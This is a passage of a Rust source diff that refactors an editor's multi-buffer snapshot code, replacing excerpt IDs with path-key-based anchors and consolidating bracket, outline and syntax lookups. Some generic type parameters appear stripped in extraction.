= excerpt.range.context.start; - } - Anchor::in_buffer(excerpt.id, text_anchor) - } else if anchor.text_anchor.bias == Bias::Left { - Anchor::min() - } else { - Anchor::max() - }; + pub fn excerpts_for_buffer( + &self, + buffer_id: BufferId, + ) -> impl Iterator> { + if let Some(buffer_state) = self.buffers.get(&buffer_id) { + let path_key = buffer_state.path_key.clone(); + let mut cursor = self.excerpts.cursor::(()); + cursor.seek_forward(&path_key, Bias::Left); + Some(iter::from_fn(move || { + let excerpt = cursor.item()?; + if excerpt.path_key != path_key { + return None; } - - result.push((anchor_ix, anchor, kept_position)); - } + cursor.next(); + Some(excerpt.range.clone()) + })) + } else { + None } - result.sort_unstable_by(|a, b| a.1.cmp(&b.1, self)); - result + .into_iter() + .flatten() } pub fn anchor_before(&self, position: T) -> Anchor { @@ -5891,7 +5192,7 @@ impl MultiBufferSnapshot { .. }) = diff_transforms.item() { - let diff = self.diffs.get(buffer_id).expect("missing diff"); + let diff = self.diff_state(*buffer_id).expect("missing diff"); if offset_in_transform > base_text_byte_range.len() { debug_assert!(*has_trailing_newline); bias = Bias::Right; @@ -5908,132 +5209,158 @@ impl MultiBufferSnapshot { let mut excerpts = self .excerpts - .cursor::>>(()); + .cursor::>(()); excerpts.seek(&excerpt_offset, Bias::Right); if excerpts.item().is_none() && excerpt_offset == excerpts.start().0 && bias == Bias::Left { excerpts.prev(); } if let Some(excerpt) = excerpts.item() { + let buffer_snapshot = excerpt.buffer_snapshot(self); let mut overshoot = excerpt_offset.saturating_sub(excerpts.start().0); if excerpt.has_trailing_newline && excerpt_offset == excerpts.end().0 { overshoot -= 1; bias = Bias::Right; } - let buffer_start = excerpt.range.context.start.to_offset(&excerpt.buffer); - let text_anchor = - excerpt.clip_anchor(excerpt.buffer.anchor_at(buffer_start + overshoot, bias)); - let anchor = Anchor::in_buffer(excerpt.id, text_anchor); - match diff_base_anchor { + let buffer_start = excerpt.range.context.start.to_offset(&buffer_snapshot); + let text_anchor = excerpt.clip_anchor( + buffer_snapshot.anchor_at(buffer_start + overshoot, bias), + self, + ); + let anchor = ExcerptAnchor::in_buffer(excerpt.path_key_index, text_anchor); + let anchor = match diff_base_anchor { Some(diff_base_anchor) => anchor.with_diff_base_anchor(diff_base_anchor), None => anchor, - } + }; + anchor.into() } else if excerpt_offset == ExcerptDimension(MultiBufferOffset::ZERO) && bias == Bias::Left { - Anchor::min() + Anchor::Min } else { - Anchor::max() + Anchor::Max } } - /// Wraps the [`text::Anchor`] in a [`crate::Anchor`] if this multi-buffer is a singleton. - pub fn as_singleton_anchor(&self, text_anchor: text::Anchor) -> Option { - let (excerpt, buffer, _) = self.as_singleton()?; - if text_anchor.buffer_id.is_none_or(|id| id == buffer) { - Some(Anchor::in_buffer(excerpt, text_anchor)) - } else { - None - } + /// Lifts a buffer anchor to a multibuffer anchor without checking against excerpt boundaries. Returns `None` if there are no excerpts for the buffer + pub fn anchor_in_buffer(&self, anchor: text::Anchor) -> Option { + let path_key_index = self.path_key_index_for_buffer(anchor.buffer_id)?; + Some(Anchor::in_buffer(path_key_index, anchor)) } - /// Returns an anchor for the given excerpt and text anchor, - /// Returns [`None`] if the excerpt_id is no longer valid or the text anchor range is out of excerpt's bounds. - pub fn anchor_range_in_excerpt( - &self, - excerpt_id: ExcerptId, - text_anchor: Range, - ) -> Option> { - let excerpt = self.excerpt(self.latest_excerpt_id(excerpt_id))?; - - Some( - Self::anchor_in_excerpt_(excerpt, text_anchor.start)? - ..Self::anchor_in_excerpt_(excerpt, text_anchor.end)?, - ) - } + /// Creates a multibuffer anchor for the given buffer anchor, if it is contained in any excerpt. + pub fn anchor_in_excerpt(&self, text_anchor: text::Anchor) -> Option { + for excerpt in { + let this = &self; + let buffer_id = text_anchor.buffer_id; + if let Some(buffer_state) = this.buffers.get(&buffer_id) { + let path_key = buffer_state.path_key.clone(); + let mut cursor = this.excerpts.cursor::(()); + cursor.seek_forward(&path_key, Bias::Left); + Some(iter::from_fn(move || { + let excerpt = cursor.item()?; + if excerpt.path_key != path_key { + return None; + } + cursor.next(); + Some(excerpt) + })) + } else { + None + } + .into_iter() + .flatten() + } { + let buffer_snapshot = excerpt.buffer_snapshot(self); + if excerpt.range.contains(&text_anchor, &buffer_snapshot) { + return Some(Anchor::in_buffer(excerpt.path_key_index, text_anchor)); + } + } - /// Returns an anchor for the given excerpt and text anchor, - /// Returns [`None`] if the excerpt_id is no longer valid or the text anchor range is out of excerpt's bounds. - pub fn anchor_in_excerpt( - &self, - excerpt_id: ExcerptId, - text_anchor: text::Anchor, - ) -> Option { - let excerpt = self.excerpt(self.latest_excerpt_id(excerpt_id))?; - Self::anchor_in_excerpt_(excerpt, text_anchor) + None } - /// Same as [`MultiBuffer::anchor_in_excerpt`], but more efficient than calling it multiple times. - pub fn anchors_in_excerpt( + /// Creates a multibuffer anchor for the given buffer anchor, if it is contained in any excerpt. + pub fn buffer_anchor_range_to_anchor_range( &self, - excerpt_id: ExcerptId, - text_anchors: impl IntoIterator, - ) -> Option>> { - let excerpt = self.excerpt(self.latest_excerpt_id(excerpt_id))?; - Some( - text_anchors - .into_iter() - .map(|text_anchor| Self::anchor_in_excerpt_(excerpt, text_anchor)), - ) - } - - fn anchor_in_excerpt_(excerpt: &Excerpt, text_anchor: text::Anchor) -> Option { - match text_anchor.buffer_id { - Some(buffer_id) if buffer_id == excerpt.buffer_id => (), - Some(_) => return None, - None if text_anchor.is_max() || text_anchor.is_min() => { - return Some(Anchor::in_buffer(excerpt.id, text_anchor)); + text_anchor: Range, + ) -> Option> { + for excerpt in { + let this = &self; + let buffer_id = text_anchor.start.buffer_id; + if let Some(buffer_state) = this.buffers.get(&buffer_id) { + let path_key = buffer_state.path_key.clone(); + let mut cursor = this.excerpts.cursor::(()); + cursor.seek_forward(&path_key, Bias::Left); + Some(iter::from_fn(move || { + let excerpt = cursor.item()?; + if excerpt.path_key != path_key { + return None; + } + cursor.next(); + Some(excerpt) + })) + } else { + None + } + .into_iter() + .flatten() + } { + let buffer_snapshot = excerpt.buffer_snapshot(self); + if excerpt.range.contains(&text_anchor.start, &buffer_snapshot) + && excerpt.range.contains(&text_anchor.end, &buffer_snapshot) + { + return Some(Anchor::range_in_buffer(excerpt.path_key_index, text_anchor)); } - None => return None, - } - - let context = &excerpt.range.context; - if context.start.cmp(&text_anchor, &excerpt.buffer).is_gt() - || context.end.cmp(&text_anchor, &excerpt.buffer).is_lt() - { - return None; } - Some(Anchor::in_buffer(excerpt.id, text_anchor)) - } - - pub fn context_range_for_excerpt(&self, excerpt_id: ExcerptId) -> Option> { - Some(self.excerpt(excerpt_id)?.range.context.clone()) + None } - pub fn excerpt_range_for_excerpt( + /// Returns a buffer anchor and its buffer snapshot for the given anchor, if it is in the multibuffer. + pub fn anchor_to_buffer_anchor( &self, - excerpt_id: ExcerptId, - ) -> Option> { - Some(self.excerpt(excerpt_id)?.range.clone()) + anchor: Anchor, + ) -> Option<(text::Anchor, &BufferSnapshot)> { + match anchor { + Anchor::Min => { + let excerpt = self.excerpts.first()?; + let buffer = excerpt.buffer_snapshot(self); + Some((excerpt.range.context.start, buffer)) + } + Anchor::Excerpt(excerpt_anchor) => { + let buffer = self.buffer_for_id(excerpt_anchor.buffer_id())?; + Some((excerpt_anchor.text_anchor, buffer)) + } + Anchor::Max => { + let excerpt = self.excerpts.last()?; + let buffer = excerpt.buffer_snapshot(self); + Some((excerpt.range.context.end, buffer)) + } + } } pub fn can_resolve(&self, anchor: &Anchor) -> bool { - if anchor.is_min() || anchor.is_max() { + match anchor { // todo(lw): should be `!self.is_empty()` - true - } else if let Some(excerpt) = self.excerpt(anchor.excerpt_id) { - excerpt.buffer.can_resolve(&anchor.text_anchor) - } else { - false + Anchor::Min | Anchor::Max => true, + Anchor::Excerpt(excerpt_anchor) => { + let Some(target) = excerpt_anchor.try_seek_target(self) else { + return false; + }; + let mut cursor = self.excerpts.cursor::(()); + cursor.seek(&target, Bias::Left); + let Some(excerpt) = cursor.item() else { + return false; + }; + excerpt + .buffer_snapshot(self) + .can_resolve(&excerpt_anchor.text_anchor()) + } } } - pub fn excerpts( - &self, - ) -> impl Iterator)> { - self.excerpts - .iter() - .map(|excerpt| (excerpt.id, &*excerpt.buffer, excerpt.range.clone())) + pub fn excerpts(&self) -> impl Iterator> { + self.excerpts.iter().map(|excerpt| excerpt.range.clone()) } fn cursor<'a, MBD, BD>(&'a self) -> MultiBufferCursor<'a, MBD, BD> @@ -6046,35 +5373,17 @@ impl MultiBufferSnapshot { MultiBufferCursor { excerpts, diff_transforms, - diffs: &self.diffs, cached_region: OnceCell::new(), + snapshot: self, } } - pub fn excerpt_before(&self, excerpt_id: ExcerptId) -> Option> { - let start_locator = self.excerpt_locator_for_id(excerpt_id); - let mut excerpts = self - .excerpts - .cursor::, ExcerptOffset>>(()); - excerpts.seek(&Some(start_locator), Bias::Left); + pub fn excerpt_before(&self, anchor: Anchor) -> Option> { + let target = anchor.try_seek_target(&self)?; + let mut excerpts = self.excerpts.cursor::(()); + excerpts.seek(&target, Bias::Left); excerpts.prev(); - - let mut diff_transforms = self - .diff_transforms - .cursor::>(()); - diff_transforms.seek(&excerpts.start().1, Bias::Left); - if diff_transforms.end().excerpt_dimension < excerpts.start().1 { - diff_transforms.next(); - } - - let excerpt = excerpts.item()?; - Some(MultiBufferExcerpt { - excerpt, - offset: diff_transforms.start().output_dimension.0, - buffer_offset: BufferOffset(excerpt.range.context.start.to_offset(&excerpt.buffer)), - excerpt_offset: excerpts.start().1, - diff_transforms, - }) + Some(excerpts.item()?.range.clone()) } pub fn excerpt_boundaries_in_range( @@ -6119,7 +5428,7 @@ impl MultiBufferSnapshot { } else { cursor.seek_to_start_of_current_excerpt(); } - let mut prev_region = cursor + let mut prev_excerpt = cursor .fetch_excerpt_with_range() .map(|(excerpt, _)| excerpt); @@ -6134,7 +5443,7 @@ impl MultiBufferSnapshot { let (next_excerpt, next_range) = cursor.fetch_excerpt_with_range()?; cursor.next_excerpt_forwards(); if !bounds.contains(&next_range.start.key) { - prev_region = Some(next_excerpt); + prev_excerpt = Some(next_excerpt); continue; } @@ -6145,18 +5454,20 @@ impl MultiBufferSnapshot { self.max_point() }; - let prev = prev_region.as_ref().map(|region| ExcerptInfo { - id: region.id, - buffer: region.buffer.clone(), - buffer_id: region.buffer_id, - range: region.range.clone(), + let prev = prev_excerpt.as_ref().map(|excerpt| ExcerptBoundaryInfo { + start_anchor: Anchor::in_buffer( + excerpt.path_key_index, + excerpt.range.context.start, + ), + range: excerpt.range.clone(), end_row: MultiBufferRow(next_region_start.row), }); - let next = ExcerptInfo { - id: next_excerpt.id, - buffer: next_excerpt.buffer.clone(), - buffer_id: next_excerpt.buffer_id, + let next = ExcerptBoundaryInfo { + start_anchor: Anchor::in_buffer( + next_excerpt.path_key_index, + next_excerpt.range.context.start, + ), range: next_excerpt.range.clone(), end_row: if next_excerpt.has_trailing_newline { MultiBufferRow(next_region_end.row - 1) @@ -6167,7 +5478,7 @@ impl MultiBufferSnapshot { let row = MultiBufferRow(next_region_start.row); - prev_region = Some(next_excerpt); + prev_excerpt = Some(next_excerpt); return Some(ExcerptBoundary { row, prev, next }); } @@ -6182,13 +5493,98 @@ impl MultiBufferSnapshot { self.non_text_state_update_count } - /// Returns the smallest enclosing bracket ranges containing the given range or - /// None if no brackets contain range or the range is not contained in a single - /// excerpt + /// Allows converting several ranges within the same excerpt between buffer offsets and multibuffer offsets. /// - /// Can optionally pass a range_filter to filter the ranges of brackets to consider - #[ztracing::instrument(skip_all)] - pub fn innermost_enclosing_bracket_ranges( + /// If the input range is contained in a single excerpt, invokes the callback with the full range of that excerpt + /// and the input range both converted to buffer coordinates. The buffer ranges returned by the callback are lifted back + /// to multibuffer offsets and returned. + /// + /// Returns `None` if the input range spans multiple excerpts. + pub fn map_excerpt_ranges<'a, T>( + &'a self, + position: Range, + f: impl FnOnce( + &'a BufferSnapshot, + ExcerptRange, + Range, + ) -> Vec<(Range, T)>, + ) -> Option, T)>> { + let mut cursor = self.cursor::(); + cursor.seek(&position.start); + + let region = cursor.region()?; + if !region.is_main_buffer { + return None; + } + let excerpt = cursor.excerpt()?; + let excerpt_start = *cursor.excerpts.start(); + let input_buffer_start = cursor.buffer_position_at(&position.start)?; + + cursor.seek_forward(&position.end); + if cursor.excerpt()? != excerpt { + return None; + } + let region = cursor.region()?; + if !region.is_main_buffer { + return None; + } + let input_buffer_end = cursor.buffer_position_at(&position.end)?; + let input_buffer_range = input_buffer_start..input_buffer_end; + let buffer = excerpt.buffer_snapshot(self); + let excerpt_context_range = excerpt.range.context.to_offset(buffer); + let excerpt_context_range = + BufferOffset(excerpt_context_range.start)..BufferOffset(excerpt_context_range.end); + let excerpt_primary_range = excerpt.range.primary.to_offset(buffer); + let excerpt_primary_range = + BufferOffset(excerpt_primary_range.start)..BufferOffset(excerpt_primary_range.end); + let results = f( + buffer, + ExcerptRange { + context: excerpt_context_range.clone(), + primary: excerpt_primary_range, + }, + input_buffer_range, + ); + let mut diff_transforms = cursor.diff_transforms; + Some( + results + .into_iter() + .map(|(buffer_range, metadata)| { + let clamped_start = buffer_range + .start + .max(excerpt_context_range.start) + .min(excerpt_context_range.end); + let clamped_end = buffer_range + .end + .max(clamped_start) + .min(excerpt_context_range.end); + let excerpt_offset_start = + excerpt_start + (clamped_start.0 - excerpt_context_range.start.0); + let excerpt_offset_end = + excerpt_start + (clamped_end.0 - excerpt_context_range.start.0); + + diff_transforms.seek(&excerpt_offset_start, Bias::Right); + let mut output_start = diff_transforms.start().output_dimension; + output_start += + excerpt_offset_start - diff_transforms.start().excerpt_dimension; + + diff_transforms.seek_forward(&excerpt_offset_end, Bias::Right); + let mut output_end = diff_transforms.start().output_dimension; + output_end += excerpt_offset_end - diff_transforms.start().excerpt_dimension; + + (output_start.0..output_end.0, metadata) + }) + .collect(), + ) + } + + /// Returns the smallest enclosing bracket ranges containing the given range or + /// None if no brackets contain range or the range is not contained in a single + /// excerpt + /// + /// Can optionally pass a range_filter to filter the ranges of brackets to consider + #[ztracing::instrument(skip_all)] + pub fn innermost_enclosing_bracket_ranges( &self, range: Range, range_filter: Option< @@ -6196,32 +5592,31 @@ impl MultiBufferSnapshot { >, ) -> Option<(Range, Range)> { let range = range.start.to_offset(self)..range.end.to_offset(self); - let mut excerpt = self.excerpt_containing(range.clone())?; - let buffer = excerpt.buffer(); - let excerpt_buffer_range = excerpt.buffer_range(); - - // Filter to ranges contained in the excerpt - let range_filter = |open: Range, close: Range| -> bool { - excerpt_buffer_range.contains(&BufferOffset(open.start)) - && excerpt_buffer_range.contains(&BufferOffset(close.end)) - && range_filter.is_none_or(|filter| { - filter( - buffer, - BufferOffset(open.start)..BufferOffset(close.end), - BufferOffset(close.start)..BufferOffset(close.end), - ) - }) - }; - - let (open, close) = excerpt.buffer().innermost_enclosing_bracket_ranges( - excerpt.map_range_to_buffer(range), - Some(&range_filter), - )?; - - Some(( - excerpt.map_range_from_buffer(BufferOffset(open.start)..BufferOffset(open.end)), - excerpt.map_range_from_buffer(BufferOffset(close.start)..BufferOffset(close.end)), - )) + let results = + self.map_excerpt_ranges(range, |buffer, excerpt_range, input_buffer_range| { + let filter = |open: Range, close: Range| -> bool { + excerpt_range.context.start.0 <= open.start + && close.end <= excerpt_range.context.end.0 + && range_filter.is_none_or(|filter| { + filter( + buffer, + BufferOffset(open.start)..BufferOffset(close.end), + BufferOffset(close.start)..BufferOffset(close.end), + ) + }) + }; + let Some((open, close)) = + buffer.innermost_enclosing_bracket_ranges(input_buffer_range, Some(&filter)) + else { + return Vec::new(); + }; + vec![ + (BufferOffset(open.start)..BufferOffset(open.end), ()), + (BufferOffset(close.start)..BufferOffset(close.end), ()), + ] + })?; + let [(open, _), (close, _)] = results.try_into().ok()?; + Some((open, close)) } /// Returns enclosing bracket ranges containing the given range or returns None if the range is @@ -6229,30 +5624,33 @@ impl MultiBufferSnapshot { pub fn enclosing_bracket_ranges( &self, range: Range, - ) -> Option, Range)> + '_> - { + ) -> Option, Range)>> { let range = range.start.to_offset(self)..range.end.to_offset(self); - let mut excerpt = self.excerpt_containing(range.clone())?; - - Some( - excerpt - .buffer() - .enclosing_bracket_ranges(excerpt.map_range_to_buffer(range)) - .filter_map(move |pair| { - let open_range = - BufferOffset(pair.open_range.start)..BufferOffset(pair.open_range.end); - let close_range = - BufferOffset(pair.close_range.start)..BufferOffset(pair.close_range.end); - if excerpt.contains_buffer_range(open_range.start..close_range.end) { - Some(( - excerpt.map_range_from_buffer(open_range), - excerpt.map_range_from_buffer(close_range), - )) - } else { - None - } - }), - ) + let results = + self.map_excerpt_ranges(range, |buffer, excerpt_range, input_buffer_range| { + buffer + .enclosing_bracket_ranges(input_buffer_range) + .filter(|pair| { + excerpt_range.context.start.0 <= pair.open_range.start + && pair.close_range.end <= excerpt_range.context.end.0 + }) + .flat_map(|pair| { + [ + ( + BufferOffset(pair.open_range.start) + ..BufferOffset(pair.open_range.end), + (), + ), + ( + BufferOffset(pair.close_range.start) + ..BufferOffset(pair.close_range.end), + (), + ), + ] + }) + .collect() + })?; + Some(results.into_iter().map(|(range, _)| range).tuples()) } /// Returns enclosing bracket ranges containing the given range or returns None if the range is @@ -6263,54 +5661,55 @@ impl MultiBufferSnapshot { options: TreeSitterOptions, ) -> impl Iterator, TextObject)> + '_ { let range = range.start.to_offset(self)..range.end.to_offset(self); - self.excerpt_containing(range.clone()) - .map(|mut excerpt| { - excerpt - .buffer() - .text_object_ranges(excerpt.map_range_to_buffer(range), options) - .filter_map(move |(range, text_object)| { - let range = BufferOffset(range.start)..BufferOffset(range.end); - if excerpt.contains_buffer_range(range.clone()) { - Some((excerpt.map_range_from_buffer(range), text_object)) - } else { - None - } - }) - }) - .into_iter() - .flatten() + self.map_excerpt_ranges(range, |buffer, excerpt_range, input_buffer_range| { + buffer + .text_object_ranges(input_buffer_range, options) + .filter(|(range, _)| { + excerpt_range.context.start.0 <= range.start + && range.end <= excerpt_range.context.end.0 + }) + .map(|(range, text_object)| { + ( + BufferOffset(range.start)..BufferOffset(range.end), + text_object, + ) + }) + .collect() + }) + .into_iter() + .flatten() } - /// Returns bracket range pairs overlapping the given `range` or returns None if the `range` is - /// not contained in a single excerpt pub fn bracket_ranges( &self, range: Range, - ) -> Option, Range)> + '_> - { + ) -> Option, Range)>> { let range = range.start.to_offset(self)..range.end.to_offset(self); - let mut excerpt = self.excerpt_containing(range.clone())?; - Some( - excerpt - .buffer() - .bracket_ranges(excerpt.map_range_to_buffer(range)) - .filter_map(move |pair| { - let open_range = - BufferOffset(pair.open_range.start)..BufferOffset(pair.open_range.end); - let close_range = - BufferOffset(pair.close_range.start)..BufferOffset(pair.close_range.end); - excerpt - .contains_buffer_range(open_range.start..close_range.end) - .then(|| BracketMatch { - open_range: excerpt.map_range_from_buffer(open_range), - close_range: excerpt.map_range_from_buffer(close_range), - color_index: pair.color_index, - newline_only: pair.newline_only, - syntax_layer_depth: pair.syntax_layer_depth, - }) - }) - .map(BracketMatch::bracket_ranges), - ) + let results = + self.map_excerpt_ranges(range, |buffer, excerpt_range, input_buffer_range| { + buffer + .bracket_ranges(input_buffer_range) + .filter(|pair| { + excerpt_range.context.start.0 <= pair.open_range.start + && pair.close_range.end <= excerpt_range.context.end.0 + }) + .flat_map(|pair| { + [ + ( + BufferOffset(pair.open_range.start) + ..BufferOffset(pair.open_range.end), + (), + ), + ( + BufferOffset(pair.close_range.start) + ..BufferOffset(pair.close_range.end), + (), + ), + ] + }) + .collect() + })?; + Some(results.into_iter().map(|(range, _)| range).tuples()) } pub fn redacted_ranges<'a, T: ToOffset>( @@ -6332,7 +5731,7 @@ impl MultiBufferSnapshot { pub fn runnable_ranges( &self, range: Range, - ) -> impl Iterator, language::RunnableRange)> + '_ { + ) -> impl Iterator, language::RunnableRange)> + '_ { let range = range.start.to_offset(self)..range.end.to_offset(self); self.lift_buffer_metadata(range, move |buffer, range| { Some( @@ -6345,7 +5744,12 @@ impl MultiBufferSnapshot { .map(|runnable| (runnable.run_range.clone(), runnable)), ) }) - .map(|(run_range, runnable, _)| (run_range, runnable)) + .map(|(run_range, runnable, _)| { + ( + self.anchor_after(run_range.start)..self.anchor_before(run_range.end), + runnable, + ) + }) } pub fn line_indents( @@ -6358,7 +5762,7 @@ impl MultiBufferSnapshot { cursor.seek(&Point::new(start_row.0, 0)); iter::from_fn(move || { let mut region = cursor.region()?; - while !buffer_filter(®ion.excerpt.buffer) { + while !buffer_filter(®ion.excerpt.buffer_snapshot(self)) { cursor.next(); region = cursor.region()?; } @@ -6380,11 +5784,11 @@ impl MultiBufferSnapshot { .line_indents_in_row_range(buffer_start_row..buffer_end_row); let region_buffer_row = region.buffer_range.start.row; let region_row = region.range.start.row; - let region_buffer = ®ion.excerpt.buffer; + let region_buffer = region.excerpt.buffer_snapshot(self); cursor.next(); Some(line_indents.map(move |(buffer_row, indent)| { let row = region_row + (buffer_row - region_buffer_row); - (MultiBufferRow(row), indent, region_buffer.as_ref()) + (MultiBufferRow(row), indent, region_buffer) })) }) .flatten() @@ -6400,7 +5804,7 @@ impl MultiBufferSnapshot { cursor.seek(&Point::new(end_row.0, 0)); iter::from_fn(move || { let mut region = cursor.region()?; - while !buffer_filter(®ion.excerpt.buffer) { + while !buffer_filter(®ion.excerpt.buffer_snapshot(self)) { cursor.prev(); region = cursor.region()?; } @@ -6424,11 +5828,11 @@ impl MultiBufferSnapshot { .reversed_line_indents_in_row_range(buffer_start_row..buffer_end_row); let region_buffer_row = region.buffer_range.start.row; let region_row = region.range.start.row; - let region_buffer = ®ion.excerpt.buffer; + let region_buffer = region.excerpt.buffer_snapshot(self); cursor.prev(); Some(line_indents.map(move |(buffer_row, indent)| { let row = region_row + (buffer_row - region_buffer_row); - (MultiBufferRow(row), indent, region_buffer.as_ref()) + (MultiBufferRow(row), indent, region_buffer) })) }) .flatten() @@ -6579,8 +5983,7 @@ impl MultiBufferSnapshot { let end_row = MultiBufferRow(range.end.row); let mut row_indents = self.line_indents(start_row, |buffer| { - let settings = - language_settings(buffer.language().map(|l| l.name()), buffer.file(), cx); + let settings = LanguageSettings::for_buffer_snapshot(buffer, None, cx); settings.indent_guides.enabled || ignore_disabled_for_language }); @@ -6604,7 +6007,7 @@ impl MultiBufferSnapshot { .get_or_insert_with(|| { ( buffer.remote_id(), - language_settings(buffer.language().map(|l| l.name()), buffer.file(), cx), + LanguageSettings::for_buffer_snapshot(buffer, None, cx), ) }) .1; @@ -6699,14 +6102,8 @@ impl MultiBufferSnapshot { fn language_settings<'a>(&'a self, cx: &'a App) -> Cow<'a, LanguageSettings> { self.excerpts .first() - .map(|excerpt| &excerpt.buffer) - .map(|buffer| { - language_settings( - buffer.language().map(|language| language.name()), - buffer.file(), - cx, - ) - }) + .map(|excerpt| excerpt.buffer_snapshot(self)) + .map(|buffer| LanguageSettings::for_buffer_snapshot(buffer, None, cx)) .unwrap_or_else(move || self.language_settings_at(MultiBufferOffset::ZERO, cx)) } @@ -6715,13 +6112,11 @@ impl MultiBufferSnapshot { point: T, cx: &'a App, ) -> Cow<'a, LanguageSettings> { - let mut language = None; - let mut file = None; if let Some((buffer, offset)) = self.point_to_buffer_offset(point) { - language = buffer.language_at(offset); - file = buffer.file(); + buffer.settings_at(offset, cx) + } else { + Cow::Borrowed(&AllLanguageSettings::get_global(cx).defaults) } - language_settings(language.map(|l| l.name()), file, cx) } pub fn language_scope_at(&self, point: T) -> Option { @@ -6759,7 +6154,7 @@ impl MultiBufferSnapshot { pub fn has_diagnostics(&self) -> bool { self.excerpts .iter() - .any(|excerpt| excerpt.buffer.has_diagnostics()) + .any(|excerpt| excerpt.buffer_snapshot(self).has_diagnostics()) } pub fn diagnostic_group( @@ -6838,7 +6233,12 @@ impl MultiBufferSnapshot { .map(|entry| (entry.range, entry.diagnostic)), ) }) - .map(|(range, diagnostic, b)| (b.buffer_id, DiagnosticEntryRef { diagnostic, range })) + .map(|(range, diagnostic, excerpt)| { + ( + excerpt.buffer_snapshot(self).remote_id(), + DiagnosticEntryRef { diagnostic, range }, + ) + }) } pub fn syntax_ancestor( @@ -6846,41 +6246,52 @@ impl MultiBufferSnapshot { range: Range, ) -> Option<(tree_sitter::Node<'_>, Range)> { let range = range.start.to_offset(self)..range.end.to_offset(self); - let mut excerpt = self.excerpt_containing(range.clone())?; - let node = excerpt - .buffer() - .syntax_ancestor(excerpt.map_range_to_buffer(range))?; - let node_range = node.byte_range(); - let node_range = BufferOffset(node_range.start)..BufferOffset(node_range.end); - if !excerpt.contains_buffer_range(node_range.clone()) { - return None; - }; - Some((node, excerpt.map_range_from_buffer(node_range))) + let results = + self.map_excerpt_ranges(range, |buffer, excerpt_range, input_buffer_range| { + let Some(node) = buffer.syntax_ancestor(input_buffer_range) else { + return vec![]; + }; + let node_range = node.byte_range(); + if excerpt_range.context.start.0 <= node_range.start + && node_range.end <= excerpt_range.context.end.0 + { + vec![( + BufferOffset(node_range.start)..BufferOffset(node_range.end), + node, + )] + } else { + vec![] + } + })?; + let (output_range, node) = results.into_iter().next()?; + Some((node, output_range)) } pub fn outline(&self, theme: Option<&SyntaxTheme>) -> Option> { - let (excerpt_id, _, buffer) = self.as_singleton()?; - let outline = buffer.outline(theme); + let buffer_snapshot = self.as_singleton()?; + let excerpt = self.excerpts.first()?; + let path_key_index = excerpt.path_key_index; + let outline = buffer_snapshot.outline(theme); Some(Outline::new( outline .items .into_iter() - .flat_map(|item| { - Some(OutlineItem { - depth: item.depth, - range: self.anchor_range_in_excerpt(excerpt_id, item.range)?, - source_range_for_text: self - .anchor_range_in_excerpt(excerpt_id, item.source_range_for_text)?, - text: item.text, - highlight_ranges: item.highlight_ranges, - name_ranges: item.name_ranges, - body_range: item.body_range.and_then(|body_range| { - self.anchor_range_in_excerpt(excerpt_id, body_range) - }), - annotation_range: item.annotation_range.and_then(|annotation_range| { - self.anchor_range_in_excerpt(excerpt_id, annotation_range) - }), - }) + .map(|item| OutlineItem { + depth: item.depth, + range: Anchor::range_in_buffer(path_key_index, item.range), + source_range_for_text: Anchor::range_in_buffer( + path_key_index, + item.source_range_for_text, + ), + text: item.text, + highlight_ranges: item.highlight_ranges, + name_ranges: item.name_ranges, + body_range: item + .body_range + .map(|body_range| Anchor::range_in_buffer(path_key_index, body_range)), + annotation_range: item.annotation_range.map(|annotation_range| { + Anchor::range_in_buffer(path_key_index, annotation_range) + }), }) .collect(), )) @@ -6892,173 +6303,90 @@ impl MultiBufferSnapshot { theme: Option<&SyntaxTheme>, ) -> Option<(BufferId, Vec>)> { let anchor = self.anchor_before(offset); - let excerpt @ &Excerpt { - id: excerpt_id, - buffer_id, - ref buffer, - .. - } = self.excerpt(anchor.excerpt_id)?; - if cfg!(debug_assertions) { - match anchor.text_anchor.buffer_id { - // we clearly are hitting this according to sentry, but in what situations can this occur? - Some(anchor_buffer_id) => { - assert_eq!( - anchor_buffer_id, buffer_id, - "anchor {anchor:?} does not match with resolved excerpt {excerpt:?}" - ) - } - None => assert!(anchor.is_max()), - } - }; + let target = anchor.try_seek_target(&self)?; + let (_, _, excerpt) = self.excerpts.find((), &target, Bias::Left); + let excerpt = excerpt?; + let buffer_snapshot = excerpt.buffer_snapshot(self); Some(( - buffer_id, - buffer - .symbols_containing(anchor.text_anchor, theme) + buffer_snapshot.remote_id(), + buffer_snapshot + .symbols_containing( + anchor + .excerpt_anchor() + .map(|anchor| anchor.text_anchor()) + .unwrap_or(text::Anchor::min_for_buffer(buffer_snapshot.remote_id())), + theme, + ) .into_iter() .flat_map(|item| { Some(OutlineItem { depth: item.depth, source_range_for_text: Anchor::range_in_buffer( - excerpt_id, + excerpt.path_key_index, item.source_range_for_text, ), - range: Anchor::range_in_buffer(excerpt_id, item.range), + range: Anchor::range_in_buffer(excerpt.path_key_index, item.range), text: item.text, highlight_ranges: item.highlight_ranges, name_ranges: item.name_ranges, - body_range: item - .body_range - .map(|body_range| Anchor::range_in_buffer(excerpt_id, body_range)), - annotation_range: item - .annotation_range - .map(|body_range| Anchor::range_in_buffer(excerpt_id, body_range)), + body_range: item.body_range.map(|body_range| { + Anchor::range_in_buffer(excerpt.path_key_index, body_range) + }), + annotation_range: item.annotation_range.map(|body_range| { + Anchor::range_in_buffer(excerpt.path_key_index, body_range) + }), }) }) .collect(), )) } - fn excerpt_locator_for_id(&self, id: ExcerptId) -> &Locator { - self.try_excerpt_locator_for_id(id) - .unwrap_or_else(|| panic!("invalid excerpt id {id:?}")) + pub fn buffer_for_path(&self, path: &PathKey) -> Option<&BufferSnapshot> { + let (_, _, excerpt) = self + .excerpts + .find::((), path, Bias::Left); + Some(excerpt?.buffer_snapshot(self)) } - fn try_excerpt_locator_for_id(&self, id: ExcerptId) -> Option<&Locator> { - if id == ExcerptId::min() { - Some(Locator::min_ref()) - } else if id == ExcerptId::max() { - Some(Locator::max_ref()) - } else { - let (_, _, item) = self.excerpt_ids.find::((), &id, Bias::Left); - if let Some(entry) = item - && entry.id == id - { - return Some(&entry.locator); - } - None - } + pub fn path_for_buffer(&self, buffer_id: BufferId) -> Option<&PathKey> { + Some(&self.buffers.get(&buffer_id)?.path_key) } - /// Returns the locators referenced by the given excerpt IDs, sorted by locator. - fn excerpt_locators_for_ids( - &self, - ids: impl IntoIterator, - ) -> SmallVec<[Locator; 1]> { - let mut sorted_ids = ids.into_iter().collect::>(); - sorted_ids.sort_unstable(); - sorted_ids.dedup(); - let mut locators = SmallVec::new(); - - while sorted_ids.last() == Some(&ExcerptId::max()) { - sorted_ids.pop(); - locators.push(Locator::max()); - } - - let mut sorted_ids = sorted_ids.into_iter().peekable(); - locators.extend( - sorted_ids - .peeking_take_while(|excerpt| *excerpt == 